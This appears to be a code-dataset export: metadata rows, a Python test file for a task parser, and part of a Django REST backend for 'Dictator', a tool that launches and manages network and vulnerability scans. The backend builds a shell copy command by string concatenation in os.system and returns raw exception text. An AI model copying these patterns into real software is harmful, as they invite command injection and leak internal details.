| 21.2 | 32 | 0.811321 | 15 | 106 | 5.733333 | 0.333333 | 0.232558 | 0.325581 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150943 | 106 | 4 | 33 | 26.5 | 0.955556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
b6bc3fe642c1c58a329c2b4b12b4a835a3509621 | 10,236 | py | Python | kpolyakov_parsing/tests/test_input_loading.py | SteamPeKa/scripts_for_Aecatta | f9481b2b8c1f6c8d5be1c426ba5a54f82eb4ff82 | [
"MIT"
] | null | null | null | kpolyakov_parsing/tests/test_input_loading.py | SteamPeKa/scripts_for_Aecatta | f9481b2b8c1f6c8d5be1c426ba5a54f82eb4ff82 | [
"MIT"
] | null | null | null | kpolyakov_parsing/tests/test_input_loading.py | SteamPeKa/scripts_for_Aecatta | f9481b2b8c1f6c8d5be1c426ba5a54f82eb4ff82 | [
"MIT"
] | null | null | null | # coding=utf-8
# Creation date: 08 дек. 2020
# Creation time: 13:07
# Creator: SteamPeKa
import os
# noinspection PyProtectedMember
import kpolyakov_parsing._input_loading
class TestSimpleTask(object):
def test_create_case_1(self):
buster = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
def test_create_case_2(self):
buster = kpolyakov_parsing._input_loading.SimpleTask("3", "4")
def test_create_case_3(self):
buster = kpolyakov_parsing._input_loading.SimpleTask("B5", "6")
def test_create_case_4(self):
buster = kpolyakov_parsing._input_loading.SimpleTask("B7", "TASK8")
def test_create_case_5(self):
buster = kpolyakov_parsing._input_loading.SimpleTask(object(), object())
def test_fields_case_1(self):
buster = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
assert isinstance(buster.USE_task_key, int)
assert buster.USE_task_key == 1
assert isinstance(buster.task_bank_key, int)
assert buster.task_bank_key == 2
def test_fields_case_2(self):
buster = kpolyakov_parsing._input_loading.SimpleTask("3", "4")
assert isinstance(buster.USE_task_key, int)
assert buster.USE_task_key == 3
assert isinstance(buster.task_bank_key, int)
assert buster.task_bank_key == 4
def test_fields_case_3(self):
buster = kpolyakov_parsing._input_loading.SimpleTask("B5", "6")
assert isinstance(buster.USE_task_key, str)
assert buster.USE_task_key == "B5"
assert isinstance(buster.task_bank_key, int)
assert buster.task_bank_key == 6
def test_fields_case_4(self):
buster = kpolyakov_parsing._input_loading.SimpleTask("B7", "TASK8")
assert isinstance(buster.USE_task_key, str)
assert buster.USE_task_key == "B7"
assert isinstance(buster.task_bank_key, str)
assert buster.task_bank_key == "TASK8"
def test_fields_case_5(self):
USE_key = object()
task_key = object()
buster = kpolyakov_parsing._input_loading.SimpleTask(USE_key, task_key)
assert isinstance(buster.USE_task_key, str)
assert buster.USE_task_key == str(USE_key)
assert isinstance(buster.task_bank_key, str)
assert buster.task_bank_key == str(task_key)
def test_hash_case_1(self):
tester = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
buster = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
assert hash(buster) == hash(tester)
def test_hash_case_2(self):
tester = kpolyakov_parsing._input_loading.SimpleTask("1", 2)
buster = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
assert hash(buster) == hash(tester)
def test_hash_case_3(self):
tester = kpolyakov_parsing._input_loading.SimpleTask(1, "2")
buster = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
assert hash(buster) == hash(tester)
def test_hash_case_4(self):
tester = kpolyakov_parsing._input_loading.SimpleTask("1", "2")
buster = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
assert hash(buster) == hash(tester)
def test_eq_case_1(self):
tester = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
buster = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
assert buster == tester
assert tester == buster
buster = kpolyakov_parsing._input_loading.SimpleTask(3, 4)
assert buster != tester
assert tester != buster
def test_eq_case_2(self):
tester = kpolyakov_parsing._input_loading.SimpleTask("1", 2)
buster = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
assert buster == tester
assert tester == buster
buster = kpolyakov_parsing._input_loading.SimpleTask("3", 4)
assert buster != tester
assert tester != buster
def test_eq_case_3(self):
tester = kpolyakov_parsing._input_loading.SimpleTask(1, "2")
buster = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
assert buster == tester
assert tester == buster
buster = kpolyakov_parsing._input_loading.SimpleTask(3, "4")
assert buster != tester
assert tester != buster
def test_hash_case_5(self):
tester = kpolyakov_parsing._input_loading.SimpleTask("1", "2")
buster = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
assert buster == tester
assert tester == buster
buster = kpolyakov_parsing._input_loading.SimpleTask("3", "4")
assert buster != tester
assert tester != buster
def test_cmp_case_1(self):
tester = kpolyakov_parsing._input_loading.SimpleTask(5, 5)
buster = kpolyakov_parsing._input_loading.SimpleTask(4, 5) # Leser
assert (buster < tester) is True
assert (tester < buster) is False
assert (buster <= tester) is True
assert (tester <= buster) is False
assert (buster > tester) is False
assert (tester > buster) is True
assert (buster >= tester) is False
assert (tester >= buster) is True
buster = kpolyakov_parsing._input_loading.SimpleTask("5", 5) # Equal
assert (buster < tester) is False
assert (tester < buster) is False
assert (buster <= tester) is True
assert (tester <= buster) is True
assert (buster > tester) is False
assert (tester > buster) is False
assert (buster >= tester) is True
assert (tester >= buster) is True
buster = kpolyakov_parsing._input_loading.SimpleTask(6, 5) # Greater
assert (buster < tester) is False
assert (tester < buster) is True
assert (buster <= tester) is False
assert (tester <= buster) is True
assert (buster > tester) is True
assert (tester > buster) is False
assert (buster >= tester) is True
assert (tester >= buster) is False
def test_cmp_case_2(self):
tester = kpolyakov_parsing._input_loading.SimpleTask(5, 5)
buster = kpolyakov_parsing._input_loading.SimpleTask(5, 4) # Leser
assert (buster < tester) is True
assert (tester < buster) is False
assert (buster <= tester) is True
assert (tester <= buster) is False
assert (buster > tester) is False
assert (tester > buster) is True
assert (buster >= tester) is False
assert (tester >= buster) is True
buster = kpolyakov_parsing._input_loading.SimpleTask(5, "5") # Equal
assert (buster < tester) is False
assert (tester < buster) is False
assert (buster <= tester) is True
assert (tester <= buster) is True
assert (buster > tester) is False
assert (tester > buster) is False
assert (buster >= tester) is True
assert (tester >= buster) is True
buster = kpolyakov_parsing._input_loading.SimpleTask(5, 6) # Greater
assert (buster < tester) is False
assert (tester < buster) is True
assert (buster <= tester) is False
assert (tester <= buster) is True
assert (buster > tester) is True
assert (tester > buster) is False
assert (buster >= tester) is True
assert (tester >= buster) is False
def test_cmp_case_3(self):
tester = kpolyakov_parsing._input_loading.SimpleTask(5, 5)
buster = kpolyakov_parsing._input_loading.SimpleTask(4, 4) # Leser
assert (buster < tester) is True
assert (tester < buster) is False
assert (buster <= tester) is True
assert (tester <= buster) is False
assert (buster > tester) is False
assert (tester > buster) is True
assert (buster >= tester) is False
assert (tester >= buster) is True
buster = kpolyakov_parsing._input_loading.SimpleTask("5", "5") # Equal
assert (buster < tester) is False
assert (tester < buster) is False
assert (buster <= tester) is True
assert (tester <= buster) is True
assert (buster > tester) is False
assert (tester > buster) is False
assert (buster >= tester) is True
assert (tester >= buster) is True
buster = kpolyakov_parsing._input_loading.SimpleTask(6, 6) # Greater
assert (buster < tester) is False
assert (tester < buster) is True
assert (buster <= tester) is False
assert (tester <= buster) is True
assert (buster > tester) is True
assert (tester > buster) is False
assert (buster >= tester) is True
assert (tester >= buster) is False
class TestTaskBatch(object):
# TODO Написать тесты для батчей
pass
class TestLoadFromTxt(object):
def test_load_from_path(self):
path = os.path.join("tests", "test_data.txt")
tester = {
(25, 7), (25, 11), (25, 28), (25, 31), (25, 50), (25, 67),
(11, 6), (11, 10), (11, 81), (11, 25), (11, 61), (11, 13), (11, 79),
}
buster = set()
for simple_task in kpolyakov_parsing._input_loading.load_from_txt(path=path):
buster.add((simple_task.USE_task_key, simple_task.task_bank_key))
assert len(tester ^ buster) == 0, "{{{}}} != {{{}}}. Symmetrical difference: {{{}}}".format(
", ".join(str(a) for a in tester),
", ".join(str(a) for a in buster),
", ".join(str(a) for a in (tester ^ buster))
)
def test_load_from_file(self):
path = os.path.join("tests", "test_data.txt")
tester = {
(25, 7), (25, 11), (25, 28), (25, 31), (25, 50), (25, 67),
(11, 6), (11, 10), (11, 81), (11, 25), (11, 61), (11, 13), (11, 79),
}
buster = set()
with open(path, "r") as f:
for simple_task in kpolyakov_parsing._input_loading.load_from_txt(file=f):
buster.add((simple_task.USE_task_key, simple_task.task_bank_key))
assert len(tester ^ buster) == 0, "{{{}}} != {{{}}}. Symmetrical difference: {{{}}}".format(
", ".join(str(a) for a in tester),
", ".join(str(a) for a in buster),
", ".join(str(a) for a in (tester ^ buster))
)
| 39.674419 | 100 | 0.630422 | 1,281 | 10,236 | 4.826698 | 0.079625 | 0.104803 | 0.152838 | 0.203785 | 0.910238 | 0.909267 | 0.902151 | 0.894226 | 0.894226 | 0.893094 | 0 | 0.029381 | 0.261821 | 10,236 | 257 | 101 | 39.828794 | 0.788909 | 0.019734 | 0 | 0.707547 | 0 | 0 | 0.019365 | 0 | 0 | 0 | 0 | 0.003891 | 0.537736 | 1 | 0.108491 | false | 0.004717 | 0.009434 | 0 | 0.132075 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
b6d59f99255826d76129bd0f2e05f78c62ca0388 | 75,387 | py | Python | Dictator_service/views.py | FurqanKhan1/Dictator | 74e29c12a8f92292ab3275661622c0632cdd0a7b | [
"Unlicense"
] | 5 | 2019-03-14T10:17:22.000Z | 2019-10-23T14:04:12.000Z | Dictator_service/views.py | FurqanKhan1/Dictator | 74e29c12a8f92292ab3275661622c0632cdd0a7b | [
"Unlicense"
] | null | null | null | Dictator_service/views.py | FurqanKhan1/Dictator | 74e29c12a8f92292ab3275661622c0632cdd0a7b | [
"Unlicense"
] | 14 | 2019-03-14T10:34:02.000Z | 2021-10-31T17:34:13.000Z | """
@Author :Furqan Khan
@Email :furqankhan08@gmail.com
@Date :1/3/2017
Objective :
The purpose of this file /module /Class is to map to serve teh Rest request
Depending upon the requested url the views module will fetch the data from the backend
python files and would transform the data to json format ,and would finally return the data back to the
requesting application.
"""
from django.shortcuts import render
from Dictator_service.serializers import UserSerializer,ScanAttributes,ProfileAttributes,General,ProjectSerializer,Configuration,test_multi,Exploits,UploadXml,UploadXmlNmap,Poll_me,Polling_,ExploitsConcurrent,Merge_reports,OnFly
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.renderers import JSONRenderer
from rest_framework.parsers import JSONParser,MultiPartParser,FormParser,FileUploadParser
from rest_framework import status
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt,csrf_protect
from django.views.decorators.csrf import ensure_csrf_cookie
from django.utils.decorators import method_decorator
from wsgiref.util import FileWrapper
import Gui_main_driver
import json
import os
import nmap_parser
import FileValidator
import Polling
import uuid
import Nessus_parser
import Qualys_parser
import Report_orchestration
import Exploit_mapping
import zipfile
import IPtable,IPexploits
import ValidateProfile
#from Dictator.Dictator_service.bin_gui_1 import compiler #import *
# Create your views here.\
class SetCsrf(APIView):
"""
Objective :
This class is only for test purpose and it forces the framework to generate a csrf token
with custom authentication
"""
@method_decorator(ensure_csrf_cookie)
def get(self,request,format=None):
return Response(JSONRenderer().render({"helllo":"world"}))
class InitDirectory():
def __init__(self):
self.folder_dir=os.path.dirname(os.path.realpath(__file__))
self.results_path=os.path.join(self.folder_dir,"Results")
self.profiles_path=os.path.join(self.folder_dir,"Profiles")
self.folder_name=os.path.join(self.results_path,"Data_")
def init_project_directory(self):
try:
if not os.path.exists(self.folder_name+str(self.project_id)):
os.mkdir(self.folder_name+str(self.project_id))
s_path=os.path.join(self.results_path,'bk')
os.system("cp -r "+s_path+ " "+ self.folder_name+str(self.project_id)+"/")
self.data_path=self.folder_name+str(self.project_id)
return 1;
except Exception ,ee:
#self.print_Error("Error while creating directory !!"+str(ee))
print "EX "+str(ee)
return -1
class UserList(APIView):
"""
Objective :
The code is only for testing purpose and has no utility with final draft of code
"""
def get(self,request,format=None):
Employee_dict={}
Employee_list=[]
Employee_dict["id"]=1
Employee_dict["name"]="Furqan Khan"
Employee_list.append(Employee_dict)
Employee_dict={}
Employee_dict["id"]=2
Employee_dict["name"]="Burhan Khan"
Employee_list.append(Employee_dict)
serialize=UserSerializer(Employee_list,many=True)
return Response(JSONRenderer().render(serialize.data))
#return JSONResponse(serialize.data)
class StartScanConcurrent(APIView):
"""
Objective :
The objective of this class is to serve the Post method which would take the scan attributes
and would invoke appropriate backend python files Gui_main_driver.py to start the scan as a process.
Note :This class would invoke the dicovery and vulnerability scanning in concurrent mode.
IN order to understand about input given to this method and response returned read API documentation.
"""
#@csrf_exempt
def post(self,request,format=None):
#<<<<<<< HEAD
#print "Request HIt :"
#=======
print "Request HIt :"
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
#data_=JSONParser().parse(request)
scan_attributes=ScanAttributes(data=request.data)
#scan_attributes=ScanAttributes(data=data_)
return_response={}
if scan_attributes.is_valid():
#return Response(scan_attributes.data)
obj=Gui_main_driver.Gui_main()
profile_id=int(scan_attributes.data["profile"])
dir_obj=InitDirectory()
profile=ValidateProfile.Profile()
if scan_attributes.data["edit_profile"]=="1":
try:
profile_json=json.loads(scan_attributes.data["profile_json"])
except Exception ,exc:
return_response["status"]="failure"
return_response["errors"]="Exception : "+str(exc)
return_response["value"]="Exception : "+str(exc)
return Response(JSONRenderer().render(return_response))
is_valid=profile.validateProfile(profile_id,profile_json)
if is_valid in [-1, -2] :
return_response["status"]="failure"
return_response["errors"]="Invalid Json Data / Value passed for Profile"
return_response["value"]="Invalid Json Data / Value passed for Profile"
return Response(JSONRenderer().render(return_response))
elif is_valid != 1:
return_response["status"]="failure"
return_response["errors"]="Exception : "+str(is_valid)
return_response["value"]="Exception : "+str(is_valid)
return Response(JSONRenderer().render(return_response))
scan_id=obj.main_start(scan_attributes.data["project_name"],scan_attributes.data["IP_range"],scan_attributes.data["Port_range"],scan_attributes.data["switch"],"1","init",int(scan_attributes.data["profile"]),scan_attributes.data["assessment_id"],scan_attributes.data["app_id"],True)
if scan_id !=-1:
my_obj=IPtable.IPtable()
my_obj.Update_status_to_paused_or_processing(scan_id,'processing',True,True)
my_obj=IPtable.Projects()
my_obj.Update_mode(scan_id,'concurrent')
return_response["status"]="success" #+str(scan_attributes.data["project_name"])
return_response["project_id"]=str(scan_id)
return_response["value"]=str(scan_id)
if scan_attributes.data["edit_profile"]=="1":
dir_obj.project_id=int(scan_id)
status=dir_obj.init_project_directory()
if status == -1:
return_response["status"]="failure"
return_response["value"]="Scan has started but Not able to create the Directory"
else:
stat=profile.CreateCustom(dir_obj.data_path,profile_json,str(scan_id),profile_id,scan_attributes.data["assessment_id"])
if stat["status"] !="success":
return_response["status"]="failure"
return_response["value"]=stat["value"]
else:
return_response["profile_id"]=stat["value"]
IPtable.Projects().UpdateProjectProfile(scan_id,stat["value"])
else:
return_response["status"]="failure" #+str(scan_attributes.data["project_name"])
return_response["project_id"]=str(scan_id)
return_response["value"]=str(scan_id)
return Response(JSONRenderer().render(return_response))
return_response["status"]="failure"
return_response["errors"]=scan_attributes.errors
return_response["value"]=scan_attributes.errors
#return Response(return_response)
return Response(JSONRenderer().render(return_response))
class StartScan(APIView):
#@csrf_exempt
"""
Objective :
The objective of this class is to serve the Post method which would take the scan attributes
and would invoke appropriate backend python files Gui_main._driver.py to start the scan as a process
Note :This class will invoke the backend code in sequential mode
IN order to understand about input given to this method and response returned read API documentation.
"""
def post(self,request,format=None):
return_response={}
try:
scan_attributes=ScanAttributes(data=request.data)
if scan_attributes.is_valid():
obj=Gui_main_driver.Gui_main()
profile_id=int(scan_attributes.data["profile"])
dir_obj=InitDirectory()
profile=ValidateProfile.Profile()
#if profile_id in [4,5]:
if scan_attributes.data["edit_profile"]=="1":
try:
profile_json=json.loads(scan_attributes.data["profile_json"])
except Exception ,exc:
return_response["status"]="failure"
return_response["errors"]="Exception : "+str(exc)
return_response["value"]="Exception : "+str(exc)
return Response(JSONRenderer().render(return_response))
is_valid=profile.validateProfile(profile_id,profile_json)
if is_valid in [-1, -2] :
return_response["status"]="failure"
return_response["errors"]="Invalid Json Data / Value passed for Profile"
return_response["value"]="Invalid Json Data / Value passed for Profile"
return Response(JSONRenderer().render(return_response))
elif is_valid != 1:
return_response["status"]="failure"
return_response["errors"]="Exception : "+str(is_valid)
return_response["value"]="Exception : "+str(is_valid)
return Response(JSONRenderer().render(return_response))
#if is_valid == 1:
scan_id=obj.main_start(scan_attributes.data["project_name"],scan_attributes.data["IP_range"],scan_attributes.data["Port_range"],scan_attributes.data["switch"],"1","init",int(scan_attributes.data["profile"]),scan_attributes.data["assessment_id"],scan_attributes.data["app_id"])
if scan_id != -1:
my_obj=IPtable.IPtable()
my_obj.Update_status_to_paused_or_processing(scan_id,'processing')
if scan_attributes.data["mode"]=="sequential_default":
#print "\n\n\n\nabout to update mode : "+ str(scan_attributes.data["mode"])
my_objj=IPtable.Projects()
my_objj.Update_mode(scan_id,'sequential_default')
return_response["status"]="success" #+str(scan_attributes.data["project_name"])
return_response["project_id"]=str(scan_id)
#print "About to return the response :"+str(return_response)
return_response["value"]=str(scan_id)
if scan_attributes.data["edit_profile"]=="1":
dir_obj.project_id=int(scan_id)
status=dir_obj.init_project_directory()
if status == -1:
return_response["status"]="failure"
return_response["value"]="Scan has started but Not able to create the Directory"
else:
stat=profile.CreateCustom(dir_obj.data_path,profile_json,str(scan_id),profile_id,scan_attributes.data["assessment_id"])
if stat["status"] !="success":
return_response["status"]="failure"
return_response["value"]=stat["status"]
else:
return_response["profile_id"]=stat["value"]
IPtable.Projects().UpdateProjectProfile(scan_id,stat["value"])
else:
return_response["status"]="failure"
return_response["value"]="-1"
return Response(JSONRenderer().render(return_response))
return_response["status"]="failure"
return_response["errors"]=scan_attributes.errors
return_response["value"]=scan_attributes.errors
#return Response(return_response)
return Response(JSONRenderer().render(return_response))
except Exception ,ee:
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]=str(ee)
#return Response(return_response)
return Response(JSONRenderer().render(return_response))
def get(self,request,format=None):
Employee_dict={}
Employee_list=[]
Employee_dict["id"]=1
Employee_dict["name"]="Furqan Khan"
Employee_list.append(Employee_dict)
Employee_dict={}
Employee_dict["id"]=2
Employee_dict["name"]="Burhan Khan"
Employee_list.append(Employee_dict)
serialize=UserSerializer(Employee_list,many=True)
return Response(serialize.data)
class ScanProfile(APIView):
def __init__(self):
self.folder_dir=os.path.dirname(os.path.realpath(__file__))
self.Mapper_Json=os.path.join(self.folder_dir,"mapper.json")
def return_json(self,json_file):
with open (json_file,"r+") as json_file:
all_json=json.loads(json_file.read())
return all_json
def get(self,request,format=None):
try:
response_text={}
return_response={}
response_text["status"]="success"
profile_id=request.data["profile_id"]
print "profile id is : "+str(profile_id) +str(type(profile_id))
if type(profile_id)==type([]):
print "Type list"
profile_id=profile_id[0]
print "obtained"
print "id is : "+str(profile_id)
if 1:#int(profile_id )!=0:
ret_val=IPtable.Projects().Profile(profile_id)
print str(ret_val)
profile=ret_val[0]
#print "Output is : "+str(profile) +str(profile_list)
if profile ==-1:
return_response["status"]="failure"
return_response["errors"]="Some error occured.Profile Not found"
return_response["value"]="Some error occured.Profile Not found"
return Response(JSONRenderer().render(return_response))
#return
if profile=="Master":
profile_file=os.path.join(self.folder_dir,"Master.json")
elif profile=="Custom_Mandatory" or profile=="Mandatory":
profile_file=os.path.join(self.folder_dir,"Mandatory.json")
elif profile=="Custom_Analytical" or profile=="Analytical":
profile_file=os.path.join(self.folder_dir,"Analytical.json")
else:
profile_file=ret_val[1]
c={}
with open (profile_file,"r+") as custom_json:
c["data"]=json.loads(custom_json.read())
c["id"]=ret_val[2]
c["name"]=ret_val[0]
#print "Length is : "+str(len(custom_j))
response_text["Custom_json"]=c
response_text["Mapper_json"]=self.return_json(self.Mapper_Json)
return Response(JSONRenderer().render(response_text))
except Exception ,ee:
print "EXception @@: "+str(ee)
return_response={}
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
def post(self,request,format=None):
try:
response_text={}
response_text["status"]="success"
profile_id=request.data["profile_id"]
ret_val=IPtable.Projects().ShareProfile(profile_id)
return Response(JSONRenderer().render(ret_val))
except Exception ,ee:
return_response={}
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class ScanProfiles(APIView):
def __init__(self):
self.folder_dir=os.path.dirname(os.path.realpath(__file__))
self.results_path=os.path.join(self.folder_dir,"Results")
self.folder_name=os.path.join(self.results_path,"Data_")
self.All_Json=os.path.join(self.folder_dir,"all_commands.json")
self.Master_Json=os.path.join(self.folder_dir,"Master.json")
self.Mandatory_Json=os.path.join(self.folder_dir,"Mandatory.json")
self.Analytical_Json=os.path.join(self.folder_dir,"Analytical.json")
self.Mapper_Json=os.path.join(self.folder_dir,"mapper.json")
def return_json(self,json_file):
with open (json_file,"r+") as json_file:
all_json=json.loads(json_file.read())
return all_json
def get(self,request,format=None):
try:
print "Hello recieved request !!"
response_text={}
response_text["status"]="success"
response_text["All_json"]=self.return_json(self.All_Json)
response_text["Master_json"]=self.return_json(self.Master_Json)
response_text["Mandatory_json"]=self.return_json(self.Mandatory_Json)
response_text["Analytical_json"]=self.return_json(self.Analytical_Json)
response_text["Mapper_json"]=self.return_json(self.Mapper_Json)
response_text["Custom_json"]=''
#print str(request.data["profile_ids"])
profile_ids=request.data["profile_ids"]
print "profile id is --->: "+str(profile_ids) +str(type(profile_ids))
if profile_ids !=0:
print "Not zero !" +str(profile_ids)
ret_val=IPtable.Projects().Profile('',True,profile_ids)
if ret_val["status"]=="success":
print "success @@@@"
custom_json_files=ret_val["value"]
custom_j=[]
for custom in custom_json_files:
print custom["id"]
c={}
c["id"]=custom["id"]
c["name"]=custom["name"]
#with open (custom["path"],"r+") as custom_json:
# c["data"]=json.loads(custom_json.read())
custom_j.append(c)
print "Length is : "+str(len(custom_j))
response_text["Custom_json"]=custom_j
return Response(JSONRenderer().render(response_text))
except Exception ,ee:
return_response={}
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
def post(self,request,format=None): #Creating a new Custom Profile
try:
return_response={}
profile_attributes=ProfileAttributes(data=request.data)
if profile_attributes.is_valid():
obj=Gui_main_driver.Gui_main()
profile_id=int(profile_attributes.data["profile_id"])
print "Obtained Profile id : is " +str(profile_id)
if profile_id not in [1,2,3,4,5]:
return_response["status"]="failure"
return_response["errors"]="Custom Profile can be inherited only from Master ,Mandatory and Analytical Profiles"
return_response["value"]="Custom Profile can be inherited only from Master ,Mandatory and Analytical Profiles"
return Response(JSONRenderer().render(return_response))
profile_name=profile_attributes.data["profile_name"]
dir_obj=InitDirectory()
profile=ValidateProfile.Profile()
try:
profile_json=json.loads(profile_attributes.data["profile_json"])
ass_id=profile_attributes.data["assessment_id"]
is_valid=profile.validateProfile(profile_id,profile_json)
if is_valid in [-1, -2] :
return_response["status"]="failure"
return_response["errors"]="Invalid Json Data / Value passed for Profile"
return_response["value"]="Invalid Json Data / Value passed for Profile"
return Response(JSONRenderer().render(return_response))
elif is_valid != 1:
return_response["status"]="failure"
return_response["errors"]="Exception : "+str(is_valid)
return_response["value"]="Exception : "+str(is_valid)
return Response(JSONRenderer().render(return_response))
else:
custom_file=os.path.join(dir_obj.profiles_path,str(ass_id)+str(".json"))
save_p=IPtable.Projects().SaveProfile(custom_file,ass_id,profile_name,"Custom")
if save_p["status"]=="success":
with open (custom_file,"w+") as custom:
custom.write(json.dumps(profile_json,indent=4))
else:
save_p["value"]="Kindly check ,if you are giving UNique name to your profile"
return Response(JSONRenderer().render(save_p))
except Exception ,exc:
return_response["status"]="failure"
return_response["errors"]="Exception : "+str(exc)
return_response["value"]="Exception : "+str(exc)
return Response(JSONRenderer().render(return_response))
else:
return_response["status"]="failure"
return_response["errors"]=profile_attributes.errors
return_response["value"]=profile_attributes.errors
#return Response(return_response)
return Response(JSONRenderer().render(return_response))
except Exception ,ex:
return_response={}
return_response["status"]="failure"
return_response["errors"]=str(ex)
return_response["value"]=str(ex)
return Response(JSONRenderer().render(return_response))
class StopScan(APIView):
"""
Objective :
The objective of this class is to serve the Post method which would take the scan/project id
and would invoke appropriate backend python files Gui_main_driver.py to stop the scan
In order to understand about input given to this method and response returned read API documentation.
"""
#@csrf_exempt
#@method_decorator(csrf_protect)
def post(self,request,format=None):
return_response={}
try:
scan_attributes=General(data=request.data)
return_response={}
if scan_attributes.is_valid():
#return Response(scan_attributes.data)
obj=Gui_main_driver.Gui_main()
scan_id=obj.main_pause(scan_attributes.data["project_id"],'','')
if scan_id !=0:
return_response["status"]="success" #+str(scan_attributes.data["project_name"])
else:
return_response["status"]="failure"
return_response["response_code"]=str(scan_id)
return_response["value"]=str(scan_id)
#return Response(JSONRenderer().render(return_response))
return Response(JSONRenderer().render(return_response))
return_response["status"]="failure"
return_response["errors"]=scan_attributes.errors
return_response["value"]=scan_attributes.errors
return Response(JSONRenderer().render(return_response))
except Exception ,ee:
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class StopScanConc(APIView):
"""
Objective :
The objective of this class is to serve the Post method which would take the scan/project id
and would invoke appropriate backend python files Gui_main_driver.py to stop the scan
Note :This class would serve the purpose of stopping concurrent scan.Thus actually it would pause
both the discovery as well as the vulnerability scanning phase.
In order to understand about input given to this method and response returned read API documentation.
"""
#@csrf_exempt
def post(self,request,format=None):
try:
scan_attributes=General(data=request.data)
return_response={}
pause_discovery=True
pause_exploits=True
if scan_attributes.is_valid():
#return Response(scan_attributes.data)
obj=Gui_main_driver.Gui_main()
my_obj=IPtable.IPtable()
stat=IPtable.Projects().fetch_project_status(scan_attributes.data["project_id"])
if stat["status"]=="success":
if stat["value"]["project_status"]=="complete":
pause_discovery=False
if stat["value"]["project_exploits_status"]=="complete":
pause_exploits=False
else:
return_response["status"]="failure" #+str(scan_attributes.data["project_name"])
return_response["errors"]="Scan can not be started.Some error occured"
return_response["value"]="Scan status could not be fetched !!!"
return Response(JSONRenderer().render(return_response))
if pause_discovery:
scan_id=obj.main_pause(scan_attributes.data["project_id"],'','')
#<<<<<<< HEAD
#return Response(JSONRenderer().render(return_response))
#return Response(JSONRenderer().render(return_response))
if pause_exploits:
scan_id=obj.exploits_pause(scan_attributes.data["project_id"],True)
if pause_discovery or pause_exploits:
return_response["status"]="success" #+str(scan_attributes.data["project_name"])
return_response["response_code"]=str(scan_id)
return_response["value"]=str(scan_id)
return Response(JSONRenderer().render(return_response))
else:
return_response["status"]="failure"
return_response["errors"]="CANT pause scan with status as complete"
return_response["value"]="CANT pause scan with status as complete"
return Response(JSONRenderer().render(return_response))
#=======
"""return_response["status"]="success" #+str(scan_attributes.data["project_name"])
return_response["response_code"]=str(scan_id)
return_response["value"]=str(scan_id)
#return Response(JSONRenderer().render(return_response))
return Response(JSONRenderer().render(return_response))"""
"""if pause_exploits:
#exp_id=obj.exploits_pause(scan_attributes.data["project_id"],True)
return_response["status"]="failure" #+str(scan_attributes.data["project_name"])
return_response["response_code"]="0"
return_response["value"]="Pause in cuncurrent mode is avalible only with port scanning not with service scanning-Kindly go to current svans tab and select this project in order to restore the state"
#return Response(JSONRenderer().render(return_response))
return Response(JSONRenderer().render(return_response))
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6"""
else:
return_response["status"]="failure"
return_response["errors"]=scan_attributes.errors
return_response["value"]=scan_attributes.errors
return Response(JSONRenderer().render(return_response))
except Exception ,ee:
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class Switches(APIView):
def get(self,request,format=None):
try:
ret_val={}
switches={}
obj=IPtable.IPtable()
resp=obj.getSwitch()
#<<<<<<< HEAD
#print "Obtained response is :"+str(resp)
#=======
#print "Obtained response is :"+str(resp)
#>>>>>>> b6b8e9ee72399e3d683c7808a85d7f1c8ce3cbf6
return Response(JSONRenderer().render(resp))
except Exception,ex:
ret_val["status"]="failure"
ret_val["value"]=str(ex)
return Response(JSONRenderer().render(ret_val))
class ResumeScanConc(APIView):
"""
Objective :
The objective of this class is to serve the Post method which would take the scan/project id
and would invoke appropriate backend python files Gui_main_driver.py to resume paused the scan
Note :This class would serve the purpose of resuming concurrent scan.Thus actually it would pause
both the discovery as well as the vulnerability scanning phase.
In order to understand about input given to this method and response returned read API documentation.
"""
#@csrf_exempt
def post(self,request,format=None):
try:
scan_attributes=General(data=request.data)
return_response={}
if scan_attributes.is_valid():
#return Response(scan_attributes.data)
obj=Gui_main_driver.Gui_main()
my_obj=IPtable.IPtable()
stat=IPtable.Projects().fetch_project_status(scan_attributes.data["project_id"])
if stat["status"]=="success":
if stat["value"]["project_status"]=="complete":
my_obj.Update_status_to_paused_or_processing(scan_attributes.data["project_id"],'complete',False,False)
